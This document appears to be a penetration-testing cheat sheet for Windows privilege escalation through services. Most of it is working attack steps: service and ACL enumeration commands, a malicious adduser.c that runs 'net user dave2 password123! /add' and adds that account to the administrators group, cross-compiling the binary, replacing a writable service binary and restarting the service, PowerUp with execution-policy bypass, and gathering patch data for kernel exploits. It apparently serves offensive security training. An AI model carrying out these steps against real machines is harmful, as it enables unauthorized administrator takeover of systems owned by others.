Checking Services for Privesc
Summary
Sample adduser.c (cross-compile with mingw) creates a local admin: it calls system("net user dave2 password123! /add") then system("net localgroup administrators dave2 /add"). Replace a writable service binary with it, restart the service, and also check PowerShell history.
Walkthrough
Enumerate Windows services and their permissions to find privilege-escalation vectors: weak binary ACLs, unquoted service paths, modifiable service files, and scheduled tasks. Start with Get-Service, then drill into anything you can modify or restart.
Commands
List services and running service binaries
powershell
Get-Service
Get-CimInstance
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}Check permissions of each service binary
powershell
icacls "C:\xampp\apache\bin\httpd.exe"
Cross-compile a malicious service binary on Kali (adduser.c below)
bash
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Stop the service, check its start mode, reboot if you hold SeShutdown
powershell
net stop mysql
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
shutdown /r /t 0Use PowerUp to find modifiable/unquoted services
powershell
powershell -ep bypass Get-ModifiableServiceFile Get-UnquotedService Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
Manually look for unquoted service paths
cmd
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Enumerate scheduled tasks
powershell
Get-ScheduledTask schtasks /query /fo LIST /v
If all else fails, gather patch info for a kernel exploit
powershell
systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }